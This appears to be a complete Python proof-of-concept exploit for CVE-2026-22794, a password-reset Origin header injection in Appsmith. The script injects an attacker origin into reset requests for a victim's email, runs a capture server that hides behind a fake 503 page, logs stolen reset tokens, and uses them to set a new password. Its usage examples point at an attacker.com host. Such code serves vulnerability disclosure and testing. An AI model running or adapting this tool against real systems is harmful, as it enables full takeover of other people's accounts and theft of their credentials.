README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-22794 - Appsmith Origin Header Injection PoC
======================================================
Vulnerability: Password Reset Link Hijacking via Origin Header Manipulation
Affected Software: Appsmith (versions prior to patch)
Severity: Critical (CVSS 9.1)
Impact: Full Account Takeover
Description:
Appsmith uses the HTTP Origin header without validation to construct
password reset and email verification URLs. An attacker can inject a
malicious Origin header to redirect password reset tokens to an
attacker-controlled server, resulting in full account takeover.
Author: Security Researcher
Disclaimer: This tool is for authorized security testing only.
Unauthorized access to computer systems is illegal.
"""
import argparse
import requests
import threading
import socket
import sys
import time
import urllib.parse
from http.server import HTTPServer, BaseHTTPRequestHandler
from datetime import datetime
from colorama import Fore, Style, init
# Initialize colorama for cross-platform colored output
init(autoreset=True)
# Fix Windows console encoding
import io
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8', errors='replace')
sys.stderr = io.TextIOWrapper(sys.stderr.buffer, encoding='utf-8', errors='replace')
# Banner (ASCII-safe for Windows compatibility)
BANNER = f"""
{Fore.RED}+===================================================================+
| CVE-2026-22794 EXPLOIT |
| Appsmith Origin Header Injection PoC |
| Password Reset Token Hijack |
+===================================================================+{Style.RESET_ALL}
{Fore.YELLOW}[!] DISCLAIMER: For authorized security testing only!{Style.RESET_ALL}
{Fore.YELLOW}[!] Unauthorized access to computer systems is illegal.{Style.RESET_ALL}
"""
# Global storage for captured tokens
captured_tokens = []
class TokenCaptureHandler(BaseHTTPRequestHandler):
"""HTTP Handler to capture password reset tokens."""
def log_message(self, format, *args):
"""Custom logging to show captured requests."""
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(f"{Fore.GREEN}[{timestamp}] {Fore.CYAN}Request: {args[0]}{Style.RESET_ALL}")
def do_GET(self):
"""Handle GET requests - capture reset tokens."""
global captured_tokens
parsed_path = urllib.parse.urlparse(self.path)
query_params = urllib.parse.parse_qs(parsed_path.query)
print(f"\n{Fore.GREEN}{'='*60}")
print(f"{Fore.RED}[+] INCOMING REQUEST CAPTURED!{Style.RESET_ALL}")
print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Path: {Fore.WHITE}{self.path}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Client: {Fore.WHITE}{self.client_address[0]}:{self.client_address[1]}{Style.RESET_ALL}")
# Check for reset token
if 'token' in query_params:
token = query_params['token'][0]
captured_tokens.append({
'token': token,
'timestamp': datetime.now().isoformat(),
'path': self.path,
'client_ip': self.client_address[0]
})
print(f"\n{Fore.RED}[!!!] PASSWORD RESET TOKEN CAPTURED!{Style.RESET_ALL}")
print(f"{Fore.RED}[!!!] Token: {Fore.WHITE}{token}{Style.RESET_ALL}")
print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n")
# Save token to file
with open('captured_tokens.txt', 'a') as f:
f.write(f"{datetime.now().isoformat()} | {token} | {self.client_address[0]}\n")
# Send a convincing phishing page
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
# Fake "server error" page to avoid suspicion
response = """
<!DOCTYPE html>
<html>
<head>
<title>Service Temporarily Unavailable</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; padding: 50px; }
h1 { color: #333; }
p { color: #666; }
</style>
</head>
<body>
<h1>503 Service Temporarily Unavailable</h1>
<p>The server is temporarily unable to service your request. Please try again later.</p>
</body>
</html>
"""
self.wfile.write(response.encode())
def do_POST(self):
"""Handle POST requests."""
content_length = int(self.headers.get('Content-Length', 0))
post_data = self.requestline.read(content_length) if content_length else b''
print(f"\n{Fore.YELLOW}[*] POST Data Received: {post_data.decode()}{Style.RESET_ALL}")
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(b'{"status": "ok"}')
def start_capture_server(port: int, host: str = "0.0.0.0"):
"""Start the token capture HTTP server."""
server = HTTPServer((host, port), TokenCaptureHandler)
print(f"{Fore.GREEN}[+] Token capture server started on {host}:{port}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Waiting for victim to click the malicious reset link...{Style.RESET_ALL}\n")
server.serve_forever()
def send_malicious_reset_request(
target_url: str,
victim_email: str,
attacker_origin: str,
timeout: int = 30
) -> dict:
"""
Send a password reset request with a malicious Origin header.
Args:
target_url: The Appsmith target URL (e.g., https://appsmith.target.com)
victim_email: The victim's email address
attacker_origin: The attacker's server URL to receive the token
timeout: Request timeout in seconds
Returns:
dict: Result containing success status and response details
"""
# Construct the API endpoint
api_endpoint = f"{target_url.rstrip('/')}/api/v1/users/forgotPassword"
# Malicious headers with attacker-controlled Origin
headers = {
'Content-Type': 'application/json',
'Origin': attacker_origin,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.9',
'Referer': f"{target_url}/user/forgotPassword",
}
# Request payload
payload = {
'email': victim_email
}
print(f"\n{Fore.CYAN}[*] Sending malicious password reset request...{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Target: {Fore.WHITE}{api_endpoint}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Victim Email: {Fore.WHITE}{victim_email}{Style.RESET_ALL}")
print(f"{Fore.RED}[*] Malicious Origin: {Fore.WHITE}{attacker_origin}{Style.RESET_ALL}")
try:
response = requests.post(
api_endpoint,
json=payload,
headers=headers,
timeout=timeout,
verify=True # Set to False for self-signed certs in testing
)
result = {
'success': response.status_code in [200, 201, 202],
'status_code': response.status_code,
'response': response.text,
'headers': dict(response.headers)
}
if result['success']:
print(f"\n{Fore.GREEN}[+] SUCCESS! Password reset email triggered!{Style.RESET_ALL}")
print(f"{Fore.GREEN}[+] Status Code: {response.status_code}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] The victim will receive an email with a link pointing to:{Style.RESET_ALL}")
print(f"{Fore.RED} {attacker_origin}/user/resetPassword?token=XXXXX{Style.RESET_ALL}")
print(f"\n{Fore.CYAN}[*] Waiting for victim to click the link...{Style.RESET_ALL}")
else:
print(f"\n{Fore.RED}[-] Request failed with status code: {response.status_code}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Response: {response.text[:500]}{Style.RESET_ALL}")
return result
except requests.exceptions.Timeout:
print(f"{Fore.RED}[-] Request timed out{Style.RESET_ALL}")
return {'success': False, 'error': 'timeout'}
except requests.exceptions.ConnectionError as e:
print(f"{Fore.RED}[-] Connection error: {e}{Style.RESET_ALL}")
return {'success': False, 'error': str(e)}
except Exception as e:
print(f"{Fore.RED}[-] Unexpected error: {e}{Style.RESET_ALL}")
return {'success': False, 'error': str(e)}
def reset_password_with_token(
target_url: str,
token: str,
new_password: str,
timeout: int = 30
) -> dict:
"""
Complete the account takeover by resetting the password with the captured token.
Args:
target_url: The Appsmith target URL
token: The captured password reset token
new_password: The new password to set
timeout: Request timeout in seconds
Returns:
dict: Result containing success status and response details
"""
api_endpoint = f"{target_url.rstrip('/')}/api/v1/users/resetPassword"
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
}
payload = {
'token': token,
'password': new_password
}
print(f"\n{Fore.RED}[!] EXECUTING ACCOUNT TAKEOVER...{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Using captured token: {token[:20]}...{Style.RESET_ALL}")
try:
response = requests.post(
api_endpoint,
json=payload,
headers=headers,
timeout=timeout,
verify=True
)
if response.status_code in [200, 201]:
print(f"\n{Fore.GREEN}{'='*60}")
print(f"{Fore.GREEN}[+] ACCOUNT TAKEOVER SUCCESSFUL!{Style.RESET_ALL}")
print(f"{Fore.GREEN}[+] Password has been reset to: {new_password}{Style.RESET_ALL}")
print(f"{Fore.GREEN}{'='*60}{Style.RESET_ALL}\n")
return {'success': True, 'status_code': response.status_code}
else:
print(f"{Fore.RED}[-] Password reset failed: {response.status_code}{Style.RESET_ALL}")
return {'success': False, 'status_code': response.status_code, 'response': response.text}
except Exception as e:
print(f"{Fore.RED}[-] Error: {e}{Style.RESET_ALL}")
return {'success': False, 'error': str(e)}
def check_vulnerability(target_url: str) -> bool:
"""
Check if the target is potentially vulnerable to CVE-2026-22794.
Args:
target_url: The Appsmith target URL
Returns:
bool: True if potentially vulnerable, False otherwise
"""
print(f"\n{Fore.CYAN}[*] Checking if target is vulnerable...{Style.RESET_ALL}")
try:
# Try to access the forgot password endpoint
check_url = f"{target_url.rstrip('/')}/api/v1/users/forgotPassword"
# Send OPTIONS request to check CORS
response = requests.options(
check_url,
headers={'Origin': 'https://evil-attacker.com'},
timeout=10
)
# Check if the endpoint exists and accepts cross-origin
if response.status_code in [200, 204]:
cors_header = response.headers.get('Access-Control-Allow-Origin', '')
if cors_header == '*' or 'evil-attacker.com' in cors_header:
print(f"{Fore.RED}[+] Target appears VULNERABLE! CORS is misconfigured.{Style.RESET_ALL}")
return True
# Also check if we can access the API
test_response = requests.post(
check_url,
json={'email': '[email protected]'},
headers={'Origin': 'https://evil-attacker.com', 'Content-Type': 'application/json'},
timeout=10
)
if test_response.status_code != 403:
print(f"{Fore.YELLOW}[?] Target may be vulnerable. Manual verification recommended.{Style.RESET_ALL}")
return True
else:
print(f"{Fore.GREEN}[-] Target appears to validate Origin header.{Style.RESET_ALL}")
return False
except Exception as e:
print(f"{Fore.YELLOW}[?] Could not determine vulnerability status: {e}{Style.RESET_ALL}")
return False
def get_public_ip() -> str:
"""Get the public IP address of the attacker machine."""
try:
response = requests.get('https://api.ipify.org', timeout=5)
return response.text
except:
return "YOUR_PUBLIC_IP"
def main():
"""Main function to run the exploit."""
print(BANNER)
parser = argparse.ArgumentParser(
description='CVE-2026-22794 - Appsmith Origin Header Injection Exploit',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Start token capture server only
python exploit.py --listen --port 8080
# Send malicious reset request
python exploit.py --target https://appsmith.target.com --email [email protected] --attacker-url https://attacker.com
# Full automated attack
python exploit.py --target https://appsmith.target.com --email [email protected] --attacker-url https://attacker.com --listen --port 8080
# Use captured token to reset password
python exploit.py --target https://appsmith.target.com --reset-token CAPTURED_TOKEN --new-password NewP@ssw0rd!
# Check if target is vulnerable
python exploit.py --target https://appsmith.target.com --check
"""
)
parser.add_argument(
'-t', '--target',
help='Target Appsmith URL (e.g., https://appsmith.target.com)'
)
parser.add_argument(
'-e', '--email',
help='Victim email address'
)
parser.add_argument(
'-a', '--attacker-url',
help='Attacker server URL to receive the token (e.g., https://attacker.com)'
)
parser.add_argument(
'-l', '--listen',
action='store_true',
help='Start HTTP server to capture tokens'
)
parser.add_argument(
'-p', '--port',
type=int,
default=8080,
help='Port for token capture server (default: 8080)'
)
parser.add_argument(
'--host',
default='0.0.0.0',
help='Host to bind capture server (default: 0.0.0.0)'
)
parser.add_argument(
'-r', '--reset-token',
help='Use a captured token to reset password'
)
parser.add_argument(
'-n', '--new-password',
help='New password to set (used with --reset-token)'
)
parser.add_argument(
'-c', '--check',
action='store_true',
help='Check if target is vulnerable'
)
parser.add_argument(
'--timeout',
type=int,
default=30,
help='Request timeout in seconds (default: 30)'
)
args = parser.parse_args()
# If no arguments, show help
if len(sys.argv) == 1:
parser.print_help()
sys.exit(0)
# Check vulnerability
if args.check:
if not args.target:
print(f"{Fore.RED}[-] Please specify target URL with --target{Style.RESET_ALL}")
sys.exit(1)
check_vulnerability(args.target)
sys.exit(0)
# Reset password with token
if args.reset_token:
if not args.target or not args.new_password:
print(f"{Fore.RED}[-] Please specify --target and --new-password{Style.RESET_ALL}")
sys.exit(1)
reset_password_with_token(args.target, args.reset_token, args.new_password, args.timeout)
sys.exit(0)
# Start the capture server in background if requested
if args.listen:
public_ip = get_public_ip()
print(f"{Fore.CYAN}[*] Your public IP: {public_ip}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Make sure port {args.port} is accessible from the internet{Style.RESET_ALL}")
server_thread = threading.Thread(
target=start_capture_server,
args=(args.port, args.host),
daemon=True
)
server_thread.start()
time.sleep(1) # Give server time to start
# Send malicious reset request
if args.target and args.email and args.attacker_url:
result = send_malicious_reset_request(
args.target,
args.email,
args.attacker_url,
args.timeout
)
# If listening, keep the server running
if args.listen and result.get('success'):
print(f"\n{Fore.CYAN}[*] Server is running. Press Ctrl+C to stop.{Style.RESET_ALL}")
try:
while True:
time.sleep(1)
if captured_tokens:
print(f"\n{Fore.GREEN}[+] Tokens captured so far: {len(captured_tokens)}{Style.RESET_ALL}")
for t in captured_tokens:
print(f" - {t['token'][:30]}... ({t['timestamp']})")
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}")
if captured_tokens:
print(f"\n{Fore.GREEN}[+] Total tokens captured: {len(captured_tokens)}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] Tokens saved to captured_tokens.txt{Style.RESET_ALL}")
elif args.listen:
# Just run the server
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[*] Shutting down...{Style.RESET_ALL}")
else:
parser.print_help()
if __name__ == '__main__':
main()